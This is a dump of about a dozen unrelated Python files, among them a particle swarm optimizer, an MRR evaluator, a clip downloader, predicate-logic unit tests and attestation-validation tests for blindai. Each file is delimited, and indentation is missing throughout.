initial_conditions = [1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0,
0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1,
1, 1, 1, 0, 1, 1, 1]
trajectory = ntm.evolve(initial_conditions=initial_conditions, network=network,
activity_rule=ntm.ReversibleRule(ntm.rules.nks_ca_rule(122)),
past_conditions=[previous_state], timesteps=1002)
timestep = []
average_node_entropies = []
activities = ntm.get_activities_over_time_as_list(trajectory)
for i, c in enumerate(activities):
timestep.append(i)
bit_string = ''.join([str(x) for x in c])
average_node_entropies.append(ntm.average_node_entropy(activities[:i+1]))
print("%s, %s" % (i, average_node_entropies[-1]))
plt.subplot(3, 1, (1, 2))
plt.title("Avg. Node (Shannon) Entropy")
plt.gca().set_xlim(0, 1002)
plt.gca().axes.xaxis.set_ticks([])
plt.plot(timestep, average_node_entropies)
plt.subplot(3, 1, 3)
plt.gca().axes.yaxis.set_ticks([])
ntm.plot_grid(np.array(activities).T.tolist())
|
61831
|
import argparse
import csv
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
from modules.metric import mean_reciprocal_rank
def main(csv_path):
acc = 0
num = 0
with open(csv_path, "r") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count > 0:
hum_id = row[0].split(".")[0]
preds = []
for col in row[1:]:
preds.append(str(col))
print(hum_id, mean_reciprocal_rank(preds, str(hum_id)))
acc += mean_reciprocal_rank(preds, str(hum_id))
num += 1
line_count += 1
print(f'Processed {line_count} lines.')
return acc / num
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--csv_path", type=str, required=True, help="path to predict csv")
args = parser.parse_args()
mrr = main(args.csv_path)
print("-----------------------------")
print(f"MRR: {mrr}")
|
61838
|
class Solution:
def leastInterval(self, tasks: List[str], n: int) -> int:
tasksDict = collections.Counter(tasks)
heap = []
c = 0
for k, v in tasksDict.items():
heappush(heap, (-v, k))
while heap:
i = 0
stack = []
while i <= n:
if len(heap) > 0:
index, task = heappop(heap)
if index != -1:
stack.append((index + 1, task))
c += 1
if len(heap) == 0 and len(stack) == 0:
break
i += 1
for i in stack:
heappush(heap, i)
return c
|
61886
|
import tensorflow as tf
import numpy as np
from blackbox_mpc.optimizers.optimizer_base import OptimizerBase
class PSOOptimizer(OptimizerBase):
def __init__(self, env_action_space, env_observation_space,
planning_horizon=50, max_iterations=5, population_size=500,
num_agents=5, c1=tf.constant(0.3, dtype=tf.float32),
c2=tf.constant(0.5, dtype=tf.float32), w=tf.constant(0.2, dtype=tf.float32),
initial_velocity_fraction=tf.constant(0.01, dtype=tf.float32)):
"""
This class defines the particle swarm optimizer.
(https://www.cs.tufts.edu/comp/150GA/homeworks/hw3/_reading6%201995%20particle%20swarming.pdf)
Parameters
---------
env_action_space: gym.ActionSpace
Defines the action space of the gym environment.
env_observation_space: gym.ObservationSpace
Defines the observation space of the gym environment.
planning_horizon: Int
Defines the planning horizon for the optimizer (how many steps to lookahead and optimize for).
max_iterations: tf.int32
Defines the maximimum iterations for the CMAES optimizer to refine its guess for the optimal solution.
population_size: tf.int32
Defines the population size of the particles evaluated at each iteration.
num_agents: tf.int32
Defines the number of runner running in parallel
c1: tf.float32
Defines the fraction of the local best known position direction.
c2: tf.float32
Defines the fraction of the global best known position direction.
w: tf.float32
Defines the fraction of the current velocity to use.
initial_velocity_fraction: tf.float32
Defines the initial velocity fraction out of the action space.
"""
super(PSOOptimizer, self).__init__(name=None,
planning_horizon=planning_horizon,
max_iterations=max_iterations,
num_agents=num_agents,
env_action_space=env_action_space,
env_observation_space=
env_observation_space)
self._solution_dim = [self._num_agents, tf.constant(self._planning_horizon, dtype=tf.int32), self._dim_U]
self._solution_size = tf.reduce_prod(self._solution_dim)
self._population_size = population_size
self._particle_positions = tf.Variable(tf.zeros([self._population_size, *self._solution_dim], dtype=tf.float32))
self._particle_velocities = tf.Variable(tf.zeros([self._population_size, *self._solution_dim], dtype=tf.float32))
self._particle_best_known_position = tf.Variable(tf.zeros([self._population_size, *self._solution_dim],
dtype=tf.float32))
self._particle_best_known_reward = tf.Variable(tf.zeros([self._population_size, self._num_agents],
dtype=tf.float32))
#global
self._global_best_known_position = tf.Variable(tf.zeros([*self._solution_dim], dtype=tf.float32))
self._global_best_known_reward = tf.Variable(tf.zeros([self._num_agents], dtype=tf.float32))
solution_variance_values = np.tile(np.square(self._action_lower_bound - self._action_upper_bound) / 16,
[self._planning_horizon * self._num_agents, 1])
solution_variance_values = solution_variance_values.reshape([self._num_agents, self._planning_horizon, -1])
self._solution_variance = tf.constant(solution_variance_values, dtype=tf.float32)
self._c1 = c1
self._c2 = c2
self._w = w
self._initial_velocity_fraction = initial_velocity_fraction
self._solution = tf.Variable(tf.zeros([self._num_agents, self._dim_U], dtype=tf.float32))
@tf.function
def _optimize(self, current_state, time_step):
def continue_condition(t, position):
result = tf.less(t, self._max_iterations)
return result
def iterate(t, position):
#evaluate each of the particles
# Evaluate and sort solutions
feasible_particle_positions = tf.clip_by_value(self._particle_positions, self._action_lower_bound_horizon,
self._action_upper_bound_horizon)
penalty = tf.norm(tf.reshape(self._particle_positions - feasible_particle_positions, [self._population_size, self._num_agents, -1]),
axis=2) ** 2
self._particle_positions.assign(feasible_particle_positions)
rewards = self._trajectory_evaluator(current_state, self._particle_positions, time_step) - penalty
#set the best local known position
condition = tf.less(self._particle_best_known_reward, rewards)
new_particle_best_known_position = tf.where(tf.expand_dims(tf.expand_dims(condition, -1), -1), self._particle_positions,
self._particle_best_known_position)
self._particle_best_known_position.assign(new_particle_best_known_position)
new_particle_best_known_reward = tf.where(condition, rewards,
self._particle_best_known_reward)
self._particle_best_known_reward.assign(new_particle_best_known_reward)
#get the global best now
global_best_known_position_index = tf.math.argmax(self._particle_best_known_reward)
samples = tf.transpose(self._particle_best_known_position, [1, 0, 2, 3])
global_best_known_position_index = tf.cast(global_best_known_position_index, dtype=tf.int32) + tf.range(0, samples.shape[0], dtype=tf.int32) * samples.shape[1]
samples = tf.reshape(samples, [-1, *samples.shape[2:]])
self._global_best_known_position.assign(tf.gather(samples, global_best_known_position_index))
samples = tf.reshape(self._particle_best_known_reward, [-1])
self._global_best_known_reward.assign(tf.gather(samples, global_best_known_position_index))
#calculate the velocity now
adapted_particle_velocities = (self._particle_velocities * self._w) + \
(self._particle_best_known_position - self._particle_positions) * self._c1 * tf.random.normal(shape=[], dtype=tf.float32) + \
(self._global_best_known_position - self._particle_positions) * self._c2 * tf.random.normal(shape=[], dtype=tf.float32)
self._particle_velocities.assign(adapted_particle_velocities)
self._particle_positions.assign(self._particle_positions + self._particle_velocities)
return t + tf.constant(1, dtype=tf.int32), self._global_best_known_position
_ = tf.while_loop(cond=continue_condition, body=iterate, loop_vars=[tf.constant(0, dtype=tf.int32), self._global_best_known_position])
self._solution.assign(self._global_best_known_position[:, 0, :])
# update the particles position for the next iteration
lower_bound_dist = self._global_best_known_position - self._action_lower_bound_horizon
upper_bound_dist = self._action_upper_bound_horizon - self._global_best_known_position
constrained_variance = tf.minimum(tf.minimum(tf.square(lower_bound_dist / tf.constant(2, dtype=tf.float32)),
tf.square(upper_bound_dist / tf.constant(2, dtype=tf.float32))),
self._solution_variance)
samples_positions = tf.random.truncated_normal([self._population_size,
*self._solution_dim],
tf.concat([self._global_best_known_position[:, 1:],
tf.expand_dims(self._global_best_known_position[:, -1],
1)], 1),
tf.sqrt(constrained_variance),
dtype=tf.float32)
action_space = self._action_upper_bound_horizon - self._action_lower_bound_horizon
initial_velocity = self._initial_velocity_fraction * action_space
samples_velocities = tf.random.uniform([self._population_size, *self._solution_dim], -initial_velocity,
initial_velocity, dtype=tf.float32)
self._particle_positions.assign(samples_positions)
self._particle_velocities.assign(samples_velocities)
self._particle_best_known_position.assign(samples_positions)
self._particle_best_known_reward.assign(tf.fill([self._population_size, self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
self._global_best_known_reward.assign(tf.fill([self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
#end update particles
resulting_action = self._solution
return resulting_action
def reset(self):
"""
This method resets the optimizer to its default state at the beginning of the trajectory/episode.
"""
samples_positions = tf.random.uniform([self._population_size, *self._solution_dim], self._action_lower_bound_horizon,
self._action_upper_bound_horizon, dtype=tf.float32)
action_space = self._action_upper_bound_horizon - self._action_lower_bound_horizon
initial_velocity = self._initial_velocity_fraction * action_space
samples_velocities = tf.random.uniform([self._population_size, *self._solution_dim], -initial_velocity,
initial_velocity, dtype=tf.float32)
self._particle_positions.assign(samples_positions)
self._particle_velocities.assign(samples_velocities)
self._particle_best_known_position.assign(samples_positions)
self._particle_best_known_reward.assign(tf.fill([self._population_size, self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
self._global_best_known_reward.assign(tf.fill([self._num_agents],
tf.constant(-np.inf, dtype=tf.float32)))
return
|
61906
|
import os
from factory import create_app
app = create_app()
app.app_context().push()
@app.teardown_request
def teardown_request(*args, **kwargs):
'Expire and remove the session after each request'
from database import db
db.session.expire_all()
db.session.remove()
if 'Development' in os.environ.get('SERVER_SOFTWARE', ''):
from tests.conftest import create_dev_data
from database import db
create_dev_data(db.session)
if __name__ == "__main__":
app.run()
|
61948
|
from bagua.torch_api.contrib.cached_dataset import CachedDataset
from torch.utils.data.dataset import Dataset
import numpy as np
import logging
import unittest
from tests import skip_if_cuda_available
logging.basicConfig(level=logging.DEBUG)
class MyDataset(Dataset):
def __init__(self, size):
self.size = size
self.dataset = [(np.random.rand(5, 2), np.random.rand(1)) for _ in range(size)]
def __getitem__(self, item):
return self.dataset[item]
def __len__(self):
return self.size
class TestCacheDataset(unittest.TestCase):
def check_dataset(self, dataset, cache_dataset):
for _ in range(10):
for _, _ in enumerate(cache_dataset):
pass
for i in range(len(dataset)):
self.assertTrue((dataset[i][0] == cache_dataset[i][0]).all())
self.assertTrue((dataset[i][1] == cache_dataset[i][1]).all())
@skip_if_cuda_available()
def test_redis(self):
dataset1 = MyDataset(102)
dataset2 = MyDataset(102)
cache_dataset1 = CachedDataset(
dataset1,
backend="redis",
dataset_name="d1",
)
cache_dataset2 = CachedDataset(
dataset2,
backend="redis",
dataset_name="d2",
)
cache_dataset1.cache_loader.store.clear()
self.check_dataset(dataset1, cache_dataset1)
self.assertEqual(cache_dataset1.cache_loader.num_keys(), len(dataset1))
self.check_dataset(dataset2, cache_dataset2)
self.assertEqual(
cache_dataset2.cache_loader.num_keys(), len(dataset1) + len(dataset2)
)
if __name__ == "__main__":
unittest.main()
|
61970
|
from glyphNameFormatter.data.scriptPrefixes import scriptPrefixes
def process(self):
if self.has("LATIN"):
self.scriptTag = scriptPrefixes['latin']
if self.has("ARMENIAN"):
# self.scriptTag = scriptPrefixes['armenian']
self.processAs("Armenian")
elif self.has("HEBREW"):
# self.scriptTag = scriptPrefixes['hebrew']
self.processAs("Hebrew")
self.edit("LATIN SMALL LIGATURE FFI", "f_f_i")
self.edit("LATIN SMALL LIGATURE FFL", "f_f_l")
self.edit("LATIN SMALL LIGATURE FF", "f_f")
self.edit("LATIN SMALL LIGATURE FI", "fi")
self.edit("LATIN SMALL LIGATURE FL", "fl")
self.edit("LATIN SMALL LIGATURE LONG S T", "longs_t")
self.edit("LATIN SMALL LIGATURE ST", "s_t")
self.compress()
if __name__ == "__main__":
from glyphNameFormatter.exporters import printRange
printRange("Alphabetic Presentation Forms")
|
62005
|
from .Setup import EngineSetup
from Core.GlobalExceptions import Exceptions
from Services.NetworkRequests import requests
from Services.Utils.Utils import Utils
class ClipDownloader(EngineSetup):
def run(self):
try:
self.download()
except:
self.status.raiseError(Exceptions.NetworkError)
self.status.setDone()
self.syncStatus()
def download(self):
response = requests.get(self.setup.downloadInfo.getUrl(), stream=True)
if response.status_code == 200:
self.progress.totalByteSize = int(response.headers.get("Content-Length", 0))
self.progress.totalSize = Utils.formatByteSize(self.progress.totalByteSize)
self.status.setDownloading()
self.syncStatus()
try:
with open(self.setup.downloadInfo.getAbsoluteFileName(), "wb") as file:
loopCount = 0
for data in response.iter_content(1024):
file.write(data)
self.progress.byteSize += len(data)
self.progress.size = Utils.formatByteSize(self.progress.byteSize)
if loopCount % 1024 == 0:
self.syncProgress()
loopCount += 1
self.syncProgress()
except:
self.status.raiseError(Exceptions.FileSystemError)
else:
if self.progress.byteSize != self.progress.totalByteSize:
raise
else:
raise
def cancel(self):
pass
|
62011
|
from datetime import date
from typing import Type
import pytest
import sympy
from sympy import Interval, oo
from nettlesome.entities import Entity
from nettlesome.predicates import Predicate
from nettlesome.quantities import Comparison, Q_, Quantity
class TestComparisons:
def test_comparison_with_wrong_comparison_symbol(self):
with pytest.raises(ValueError):
_ = Comparison(
content="the height of {} was {}",
sign=">>",
expression=Q_("160 centimeters"),
)
def test_comparison_interval(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
assert comparison.interval == Interval(20, oo, left_open=True)
def test_comparison_not_equal(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign="!=",
expression=Q_("20 miles"),
)
assert comparison.interval == sympy.Union(
Interval(0, 20, right_open=True), Interval(20, oo, left_open=True)
)
class TestPredicates:
def test_no_sign_allowed_for_predicate(self):
with pytest.raises(TypeError):
Predicate(
"the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
def test_term_positions(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
assert predicate.term_positions() == {
"organizer1": {0, 1},
"organizer2": {0, 1},
"player1": {2, 4},
"game": {3},
"player2": {2, 4},
}
def test_term_positions_with_repetition(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert predicate.term_positions() == {
"organizer1": {0, 1},
"organizer2": {0, 1},
"game": {2},
}
def test_term_permutations(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
assert predicate.term_index_permutations() == [
(0, 1, 2, 3, 4),
(0, 1, 4, 3, 2),
(1, 0, 2, 3, 4),
(1, 0, 4, 3, 2),
]
def test_term_permutations_with_repetition(self):
predicate = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert predicate.term_index_permutations() == [
(0, 1, 2),
(1, 0, 2),
]
def test_convert_false_statement_about_quantity_to_obverse(self, make_predicate):
assert make_predicate["p7_obverse"].truth is True
assert make_predicate["p7_obverse"].quantity == Q_(35, "foot")
assert make_predicate["p7"].truth is True
assert make_predicate["p7"].sign == "<="
assert "sign='<='" in repr(make_predicate["p7"])
assert make_predicate["p7_obverse"].sign == "<="
def test_quantity_type(self, make_predicate):
assert isinstance(make_predicate["p7"].quantity, Quantity)
def test_string_for_date_as_expression(self):
copyright_date_range = Comparison(
content="the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
assert str(copyright_date_range).endswith("1978-01-01")
def test_quantity_string(self, make_predicate):
assert str(make_predicate["p7"].quantity) == "35 foot"
def test_predicate_content_comparison(self, make_predicate):
assert make_predicate["p8_exact"].content == make_predicate["p7"].content
def test_expression_comparison(self, make_predicate):
assert str(make_predicate["p7"].quantity_range) == "no more than 35 foot"
assert str(make_predicate["p9"].quantity_range) == "no more than 5 foot"
def test_predicate_has_no_expression_comparison(self, make_predicate):
with pytest.raises(AttributeError):
make_predicate["p1"].expression_comparison() == ""
def test_context_slots(self, make_predicate):
assert len(make_predicate["p7"]) == 2
def test_str_for_predicate_with_number_quantity(self, make_predicate):
assert "distance between $place1 and $place2 was at least 20" in str(
make_predicate["p8_int"]
)
assert "distance between $place1 and $place2 was at least 20.0" in str(
make_predicate["p8_float"]
)
assert "distance between $place1 and $place2 was at least 20 foot" in str(
make_predicate["p8"]
)
def test_template_singular_by_default(self):
predicate = Predicate(content="$people were in $city")
assert str(predicate.template) == 'StatementTemplate("$people was in $city")'
@pytest.mark.parametrize(
"context, expected",
[
(
[Entity(name="the book", plural=False)],
"<the book> was names, towns,",
),
(
[Entity(name="the book's listings", plural=True)],
"<the book's listings> were names, towns,",
),
],
)
def test_make_str_plural(self, context, expected):
phrase = (
"$thing were names, towns, and telephone numbers of telephone subscribers"
)
predicate = Predicate(content=phrase)
with_context = predicate._content_with_terms(context)
assert with_context.startswith(expected)
def test_str_not_equal(self, make_predicate):
assert (
"the distance between $place1 and $place2 was not equal to 35 foot"
in str(make_predicate["p7_not_equal"])
)
def test_negated_method(self, make_predicate):
assert make_predicate["p7"].negated().means(make_predicate["p7_opposite"])
assert make_predicate["p3"].negated().means(make_predicate["p3_false"])
class TestSameMeaning:
def test_predicate_equality(self, make_predicate):
assert make_predicate["p1"].means(make_predicate["p1_again"])
def test_predicate_inequality(self, make_predicate, watt_factor):
assert not make_predicate["p2"].means(make_predicate["p2_reflexive"])
def test_error_predicate_means_fact(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p2"].means(watt_factor["f2"])
def test_obverse_predicates_equal(self, make_predicate):
assert make_predicate["p7"].means(make_predicate["p7_obverse"])
def test_equal_float_and_int(self, make_predicate):
"""
These now evaluate equal even though their equal quantities are different types
"""
assert make_predicate["p8_int"].means(make_predicate["p8_float"])
def test_same_meaning_float_and_int(self, make_predicate):
"""
The Predicate means method considers equal quantities of different types to have the same meaning.
"""
assert make_predicate["p8_int"].means(make_predicate["p8_float"])
def test_no_equality_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"].means(make_predicate["p9_acres"])
def test_different_truth_value_prevents_equality(self, make_predicate):
assert not make_predicate["p_murder"].means(make_predicate["p_murder_whether"])
assert not make_predicate["p_murder_false"].means(
make_predicate["p_murder_whether"]
)
assert not make_predicate["p_murder_false"].means(make_predicate["p_murder"])
def test_predicate_does_not_mean_fact(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p8"].means(watt_factor["f8"])
def test_term_placeholders_do_not_change_result(self):
left = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
right = Predicate(
content="$promoter1 and $promoter2 planned for $player1 to play $chess with $player2."
)
assert left.means(right)
def test_term_positions_change_result(self):
left = Predicate(
content="$organizer1 and $organizer2 planned for $player1 to play $game with $player2."
)
right = Predicate(
content="$organizer1 and $organizer2 planned for $organizer1 to play $game with $organizer2."
)
assert not left.means(right)
class TestImplication:
def test_greater_than_because_of_quantity(self, make_predicate):
assert make_predicate["p8_meters"] > make_predicate["p8"]
assert make_predicate["p8_meters"] != make_predicate["p8"]
def test_greater_float_and_int(self, make_predicate):
assert make_predicate["p8_higher_int"] > make_predicate["p8_float"]
assert make_predicate["p8_int"] < make_predicate["p8_higher_int"]
def test_any_truth_value_implies_none(self, make_predicate):
assert make_predicate["p_murder"] > make_predicate["p_murder_whether"]
assert make_predicate["p_murder_false"] > make_predicate["p_murder_whether"]
def test_no_implication_by_exact_quantity(self, make_predicate):
assert not make_predicate["p_quantity=3"] > make_predicate["p_quantity>5"]
def test_no_implication_of_exact_quantity(self, make_predicate):
assert not make_predicate["p_quantity>5"] > make_predicate["p_quantity=3"]
def test_no_implication_by_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>=4"] > make_predicate["p_quantity>5"]
def test_no_implication_of_greater_or_equal_quantity(self):
less = Comparison(content="The number of mice was", sign=">", expression=4)
more = Comparison(content="The number of mice was", sign=">=", expression=5)
assert not less.implies(more)
def test_no_contradiction_inconsistent_dimensions(self):
equal = Comparison(
content="${defendant}'s sentence was", sign="=", expression="8 years"
)
less = Comparison(
content="${defendant}'s sentence was", sign="<=", expression="10 parsecs"
)
assert not equal.contradicts(less)
assert not equal.implies(less)
def test_equal_implies_greater_or_equal(self, make_predicate):
assert make_predicate["p9_exact"] > make_predicate["p9"]
def test_implication_with_not_equal(self, make_predicate):
assert make_predicate["p7_opposite"] > make_predicate["p7_not_equal"]
def test_no_implication_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"] >= make_predicate["p9_acres"]
assert not make_predicate["p9"] <= make_predicate["p9_acres"]
def test_implication_with_no_truth_value(self, make_predicate):
assert not make_predicate["p2_no_truth"] > make_predicate["p2"]
assert make_predicate["p2"] > make_predicate["p2_no_truth"]
def test_predicate_cannot_imply_factor(self, make_predicate, watt_factor):
assert not make_predicate["p7_true"] > watt_factor["f7"]
def test_implication_due_to_dates(self):
copyright_date_range = Comparison(
content="the date when $work was created was",
sign=">=",
expression=date(1978, 1, 1),
)
copyright_date_specific = Comparison(
content="the date when $work was created was",
sign="=",
expression=date(1980, 6, 20),
)
assert copyright_date_specific.implies(copyright_date_range)
class TestContradiction:
def test_predicate_no_contradictions(self, make_predicate):
assert not make_predicate["p7"].contradicts(make_predicate["p7_true"])
assert not make_predicate["p1"].contradicts(make_predicate["p1_again"])
assert not make_predicate["p3"].contradicts(make_predicate["p7"])
def test_contradiction_by_exact(self, make_predicate):
assert make_predicate["p8_exact"].contradicts(make_predicate["p8_less"])
def test_contradiction_of_exact(self, make_predicate):
assert make_predicate["p8_less"].contradicts(make_predicate["p8_exact"])
def test_contradiction_by_equal_quantity(self, make_predicate):
assert make_predicate["p_quantity=3"].contradicts(
make_predicate["p_quantity>5"]
)
def test_contradiction_of_equal_quantity(self, make_predicate):
assert make_predicate["p_quantity>5"].contradicts(
make_predicate["p_quantity=3"]
)
def test_no_contradiction_by_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>=4"].contradicts(
make_predicate["p_quantity>5"]
)
def test_no_contradiction_of_greater_or_equal_quantity(self, make_predicate):
assert not make_predicate["p_quantity>5"].contradicts(
make_predicate["p_quantity>=4"]
)
def test_error_predicate_contradict_factor(self, make_predicate, watt_factor):
with pytest.raises(TypeError):
make_predicate["p7_true"].contradicts(watt_factor["f7"])
def test_no_contradiction_with_no_truth_value(self, make_predicate):
assert not make_predicate["p2_no_truth"].contradicts(make_predicate["p2"])
assert not make_predicate["p2"].contradicts(make_predicate["p2_no_truth"])
def test_no_contradiction_with_inconsistent_dimensionality(self, make_predicate):
assert not make_predicate["p9"].contradicts(make_predicate["p9_acres"])
assert not make_predicate["p9_acres"].contradicts(make_predicate["p9"])
def test_contradiction_with_quantity(self, make_predicate):
assert make_predicate["p8_less"].contradicts(make_predicate["p8_meters"])
def test_contradictory_date_ranges(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression=date(1990, 1, 1),
)
assert later.contradicts(earlier)
assert earlier.contradicts(later)
def test_no_contradiction_without_truth_value(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
truth=None,
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression=date(1990, 1, 1),
)
assert not later.contradicts(earlier)
assert not earlier.contradicts(later)
def test_no_contradiction_date_and_time_period(self):
later = Comparison(
content="the date $dentist became a licensed dentist was",
sign=">",
expression=date(2010, 1, 1),
)
earlier = Comparison(
content="the date $dentist became a licensed dentist was",
sign="<",
expression="2000 years",
)
assert not later.contradicts(earlier)
assert not earlier.contradicts(later)
def test_no_contradiction_irrelevant_quantities(self):
more_cows = Comparison(
content="the number of cows $person owned was",
sign=">",
expression=10,
)
fewer_horses = Comparison(
content="the number of horses $person owned was",
sign="<",
expression=3,
)
assert not more_cows.contradicts(fewer_horses)
assert not fewer_horses.contradicts(more_cows)
def test_no_contradiction_of_predicate(self):
more_cows = Comparison(
content="the number of cows $person owned was",
sign=">",
expression=10,
)
no_cows = Predicate(content="the number of cows $person owned was", truth=False)
assert not more_cows.contradicts(no_cows)
assert not no_cows.contradicts(more_cows)
class TestQuantities:
def test_does_not_exclude_other_quantity(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
comparison_opposite = Comparison(
content="the distance between $place1 and $place2 was",
sign="<",
expression=Q_("30 miles"),
)
assert not comparison.contradicts(comparison_opposite)
def test_convert_quantity_of_Comparison(self):
comparison = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("20 miles"),
)
comparison_km = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression=Q_("30 kilometers"),
)
assert comparison > comparison_km
def test_quantity_comparison_to_predicate(self):
distance = Comparison(
content="the distance between $place1 and $place2 was",
sign=">",
expression="20 miles",
)
predicate = Predicate(content="the distance between $place1 and $place2 was")
assert not distance >= predicate
|
62033
|
from copy import deepcopy
from hashlib import sha256
import os
import unittest
from google.protobuf.timestamp_pb2 import Timestamp
from blindai.pb.securedexchange_pb2 import (
Payload,
)
from blindai.client import (
RunModelResponse,
UploadModelResponse,
)
from blindai.dcap_attestation import Policy
from blindai.utils.errors import SignatureError, AttestationError
from .covidnet import get_input, get_model
exec_run = os.path.join(os.path.dirname(__file__), "exec_run.proof")
exec_upload = os.path.join(os.path.dirname(__file__), "exec_upload.proof")
tmp_path = os.path.join(os.path.dirname(__file__), "tmp_exec.proof")
policy_file = os.path.join(os.path.dirname(__file__), "policy.toml")
class TestProof(unittest.TestCase):
def test_parse_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
self.assertTrue(response.is_signed())
response2 = RunModelResponse()
with open(exec_run, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
self.assertEqual(response.output, response2.output)
response3 = RunModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
self.assertEqual(response.output, response3.output)
response3.save_to_file(tmp_path)
response4 = RunModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
self.assertEqual(response.output, response4.output)
def test_parse_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
self.assertTrue(response.is_signed())
response2 = UploadModelResponse()
with open(exec_upload, "rb") as file:
response2.load_from_bytes(file.read())
self.assertEqual(response.payload, response2.payload)
self.assertEqual(response.signature, response2.signature)
self.assertEqual(response.attestation, response2.attestation)
response3 = UploadModelResponse()
response3.load_from_bytes(response.as_bytes())
self.assertEqual(response.payload, response3.payload)
self.assertEqual(response.signature, response3.signature)
self.assertEqual(response.attestation, response3.attestation)
response3.save_to_file(tmp_path)
response4 = UploadModelResponse()
response4.load_from_file(tmp_path)
self.assertEqual(response.payload, response4.payload)
self.assertEqual(response.signature, response4.signature)
self.assertEqual(response.attestation, response4.attestation)
def test_validate_run(self):
response = RunModelResponse()
response.load_from_file(exec_run)
policy = Policy.from_file(policy_file)
response.validate(
get_input(),
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
get_input(),
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.run_model_payload.output[0] += 0.1
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
get_input(),
policy=policy,
)
# Input validation
response2 = deepcopy(response)
data = deepcopy(get_input())
data[4] += 1
with self.assertRaises(SignatureError):
response2.validate(
data,
policy=policy,
)
# Using file
response.validate(
get_input(),
policy_file=policy_file,
)
def test_validate_upload(self):
response = UploadModelResponse()
response.load_from_file(exec_upload)
policy = Policy.from_file(policy_file)
model_hash = sha256(get_model()).digest()
response.validate(
model_hash,
policy=policy,
)
# Not signed
response2 = deepcopy(response)
response2.signature = None
response2.attestation = None
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Quote validation
response2 = deepcopy(response)
response2.attestation.quote += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
response2 = deepcopy(response)
response2.attestation.enclave_held_data += b"a"
with self.assertRaises(AttestationError):
response2.validate(
model_hash,
policy=policy,
)
# Payload validation
response2 = deepcopy(response)
payload = Payload.FromString(response2.payload)
payload.send_model_payload.model_hash = (
b"1" + payload.send_model_payload.model_hash[1:]
)
response2.payload = payload.SerializeToString()
with self.assertRaises(SignatureError):
response2.validate(
model_hash,
policy=policy,
)
# Input validation
response2 = deepcopy(response)
new_hash = model_hash[:5] + b"1" + model_hash[6:]
with self.assertRaises(SignatureError):
response2.validate(
new_hash,
policy=policy,
)
# Using file
response.validate(
model_hash,
policy_file=policy_file,
)
|
62036
|
from setuptools import find_packages, setup
PACKAGE_NAME = "up-bank-api"
VERSION = "0.3.2"
PROJECT_URL = "https://github.com/jcwillox/up-bank-api"
PROJECT_AUTHOR = "<NAME>"
DOWNLOAD_URL = f"{PROJECT_URL}/archive/{VERSION}.zip"
PACKAGES = find_packages()
with open("README.md", "r", encoding="UTF-8") as file:
LONG_DESCRIPTION = file.read()
if __name__ == "__main__":
setup(
name=PACKAGE_NAME,
version=VERSION,
url=PROJECT_URL,
